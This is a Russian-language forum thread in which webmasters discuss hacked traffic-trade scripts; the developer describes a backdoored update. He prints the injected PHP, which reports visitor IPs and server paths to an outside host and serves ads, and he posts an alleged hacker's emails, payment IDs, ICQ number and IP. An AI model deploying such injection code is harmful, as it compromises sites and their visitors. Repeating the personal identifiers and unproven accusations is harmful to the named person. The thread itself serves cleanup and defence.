Новая тема   Ответить

 CrazyMen
Тут че надумал.. ни к кому странный трейдер не добавлялся или в вп новый юзер?

 xDiver
Насчет скриптов - стоял стрим ротатор, ат3.
Взлом был через стрим походу сделан.

Код вставлялся в самый конец после шаблона. Т.е. код был не в шаблоне, а походу в in.php или другом файле (не index.php). И показывался исключительно определенным странам. Для европейского ИП не показывался, а для американского показывался

 X-dream
xDiver писал:

а может через панель хостенга? есть мнение что все панели дырявые...

 xDiver
Может и через панель, но я не нашел конкретно файла где стоит вредоностный код. Он вставлялся ровно после инклуда стрима в индексе. В шаблонах стрима, как я уже писал, пусто.

Решил проблему обновив стрим до последней версии, ну и перенес на свой сервер само собой с фрихоста

 eVan
кто подскажет, чем можно Trade Pulse заменить? заебался я с этими взломами, ломают только его. На сервере есть еще сайты, без Trade Pulse, никогда с ними проблем не было.

 cdroller
Crystal мне больше чем TP нра, я поменял давно ... правда сча хочу TradeX попробовать, дюже там лиц дешовые ...

так то в общем-то мне скрипты Килдозера нра тоже, но бля вечно с ними какаято хуйня, то домены прекспарятся с апдейтами и скрипты хуйни какой-то накачают, то ломают чета ...

хотя в данном случае наверно TP не причем ... не у всех же поломали

 GIVI
Тоже постоянно взламывали TP пару месяцев назад на нескольких сиджах, заменили все на Crystal, всё ок стало и сиджи выросли

 March_Cat
SkyKiller писал:

нет, раскажите пожалуйста, добрый человек

 Erotix
cdroller писал:

помню давненько(кажется с протоном) был шум, что сливали процент с трафа на какое-то дерьмо ... проду подорвало сильно моим проектам, так обхожу стороной. Как видно не напрасно перебздел

 X-dream
мне из трейд скриптов больше всего arrowscripts нравится как траф раздает...

 Kildoozer
Только собрался топик здесь новый создавать и увидел эту тему.

Все началось со взлома сервера моего партнера по проекту TradePulse в августе прошлого года.
Хакер влез на сервер, подсунул в дистрибутив скрипта бэкдор и распространил апдейт скрипта, заразив кучу серверов. Дальше был полный атас, столько грязи в свой адрес мы никогда не получали. Куча наших клиентов обвинили нас во всех смертных грехах, многие ушли от нас, кто-то потребовал материальной компенсации. Мы ДО СИХ ПОР чистим серверы клиентов от его дряни. Насколько я знаю этот же урод взломал скрипт GB Top несколько лет назад.
Стали разбираться что это за мразь это сделала. Чел особо не напрягался и ходил без проксей cо своей киргизской IP (у меня уже килобайты логов). Каждую строчку ниже я могу запруфить без проблем.

Если кто-то может пополнить список его данных - выкладывайте здесь, я думаю это будет полезно для всех. Вот что мы накопали:


Ники:
Nexxen
Nexxxen
Weber (не путать с нормальным вэбером )
Засвечен на хакерских форумах.

ICQ: 416906019

Мыла используемые мразью:
weber.poster@gmail.com
webex.post@gmail.com
weber@rbcmail.ru
zxxxz@rbcmail.ru
nexxxen@gmail.com - acc id в PayPal


WMID 101440429534. Персональный аттестат, получен в г. Бишкек, Киргизия.
https://passport.webmoney.ru/asp/certView.asp?wmid=101440429534
WMR кошелек R468875429910


Сайты урода:
gettraf.org - система 'раскрутки' сайтов
xtds.in - тдска
webexpress.name - бывший лол%%тный топ
crv.cc - раздача рекламы на зараженные сайты
cgi.bz - аналогично
hrv.bz - аналогично

Сайты хостятся у русского хостера x5x.ru, мои абузы они игнорят под предлогом 'мы проверили, ничего страшного у него не обнаружили'. Те еще уроды.

Реклама грузится таким способом:

function getClientIP () {
if (isset ($_SERVER ['HTTP_X_FORWARDED_FOR'])){
  $clientIP = $_SERVER ['HTTP_X_FORWARDED_FOR'];
}
elseif (isset ($_SERVER ['HTTP_X_REAL_IP'])){
  $clientIP = $_SERVER ['HTTP_X_REAL_IP'];
}
else {
  $clientIP = $_SERVER['REMOTE_ADDR'];
}
return $clientIP;
}
$cz = curl_init ();
curl_setopt ($cz , CURLOPT_URL , "http://hrv.bz/ny/?c=".getClientIP ()."&r=".$_SERVER['SCRIPT_FILENAME']."&s=".$_SERVER['SERVER_ADDR']."&h=@http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']);
curl_setopt ($cz , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ($cz , CURLOPT_TIMEOUT, 6);
$nz = curl_exec($cz);
curl_close($cz);
echo $nz;


- выдача только для 'хороших стран' типа US, DE и тп.
Вот пример ответа с рекламой:
{script src="http://www.trafficrevenue.net/loadad.js?username=inj"}{/script}
{script src="http://www.allabc.com/index.php?ref=code"}{/script}

Владелец первого сайта оказался адекватным и забанил урода.
Владелец второго сайта на контакт не идет.

 Sergeyka
домен регистратору его домены лочить не пробовали?
есть еще ведь ИКАН они я думаю такой безпредел терпеть не будут?

 Erotix
+1

 X-dream
Kildoozer: новая версия TP безопасна или нет?

 cdroller
Нихуя се ... какой там ИКАН в пизду ... там по кошелькам и никам погуглить, так чел еще и ддосит кого-то там периодически ... сдать в ментовку все что накопаете и норм его примут, эт когда инфо нету то никто бегать искать не будет, а если все предоставить, то с руками оторвут, по телевизору хоть посмотрим на кренделя ... Если до этого никто не сподобится ему башку проломить ...

 Kildoozer
X-dream писал:
Уже давно все безопасно.
Как говорится - нет худа без добра. Благодаря 'киргизу' мы переделали механизм обновлений скрипта, сделав его намного более секьюрным. Если не вдаваться в детали, то сейчас повторить 'апдейт' как в августе практически невозможно, для этого придется ломать сразу 3 независимых сервера.
Те 'хаки' что сейчас всплывают - это все отголоски того апдейта, в августе. Мы чистим серверы по первой просьбе, но порой откопать дыру на огромном сервере непросто. Даже если 1 файл мы пропустим, он потом все восстанавливает и распихивает свое дерьмо по новым папкам, шифруясь под нормальные скрипты.

Еще раз - все новые инсталляции абсолютно безопасны.

 X-dream
Kildoozer писал:

хм...

ну вот я на дримхосте, пока TP не снёс с трех доменов, всё возвращалось. снёс тп, обновил вп, и вроде больше не возвращалось. потом перенес все на дедик, вроде нормально, ничего такого нету. тфу тфу тфу.

правильный админ = лучшая защита от хакеров )

 Pentarh
Грепнуть пхп файлы на предмет шелл вызовов и eval, грепнуть хтаксесы на предмет AddType. Пробежаться по списку созданных апачем файлов. И все бекдоры как на ладони даже в очень большой помойке.

Правда если хакер повысил привилегии - то можно идти об стену биться.

И разработчики скриптов: вот блять нельзя никак обойтись без шелл экзеков в веб-скриптах? Так бы в мод_пхп отключить шеллы вообще нахер и все. Ультимейт дефенс.

Но нет же, имажмажик надо вызывать шеллом а не апишкой! И обязательно через веб, не не через cli.

 GIVI
X-dream писал:
та же самая фигня, пока ТР не снесли, всё возвращалось

 X-dream
мне тп нравится как скрипт. в нем есть много фишек))

желаю овнерам - удачи, безопасности, и чтоб клиенты не уходили изза таких мелочей.

 GarryBarry
да, было дело. подменял in.php в стриме (можно проверить, если вы знаете что у вас последняя версия но скрипт предлагает апдейт и апдейтит только файл in.php), подменял файлы-инклуды от линк органайзера, а этот инклуд был на всех сайтах

 Дольчик ххх
Kildoozer скажите, а если раньше, на сайтах была реклама(не моя), после вирусного апдейта, потом эти скрипты проабгрейдил, до последней версии: 1.0.8 build 43 Вроде все чисто... Может ли остаться еще угрозы, что опять появится сторонняя реклама, и как вам отдать сервер для проверки, платно ли, и что для этого необходимо?!

 Ara Man


kildoozer(ГАВ)gmail.com

 raul1987
Добрый вечер, товарищи, сегодня постучался человек, начал гуглить, так как каждого клиента проверяем и наткнулся на эту тему, что скажете?

"Здравствуйте, хотел бы обменять 6800 USD на Webmoney.
Статус аккаунта: Verified / Проверенный.
Счет зарегистрирован в Кувейте, Paypal-Email: nexxxen@gmail.com .
Средства зачислены с партнерки trafficrevenue.net. Мой WMID: 101440429534 .
Если требуются скины могу скинуть.
Какой процент сможете сделать под данную сумму?"

 CrazyMen
Вот тема (Лечение!) Ахтунг атакуют топы или дыра GB Top полуторогодовалой давности с этого айпи 94.143.197.2 этот киргиз сломал топы и заразил все даже стрим и кристал. В итоге при заходе на сайт редиректило на фарму. Я потом нашел сайт с которого этот сука заливал бэкдоры отписал хостеру что мол у вас хакер все дела, а они тупо сказали что не могут контролировать каждого. Ну хули я им депешу что мол мои юристы собирают в отношении взлома моего сервера материалы и вы будите конфигурировать в деле как хост предоставлявший услуги хакеру. После этого сам овнер вышел на связь долго извинялся за своих дебилов сотрудников и просто снесли нах его сайт, хост и все прочее что было на нем.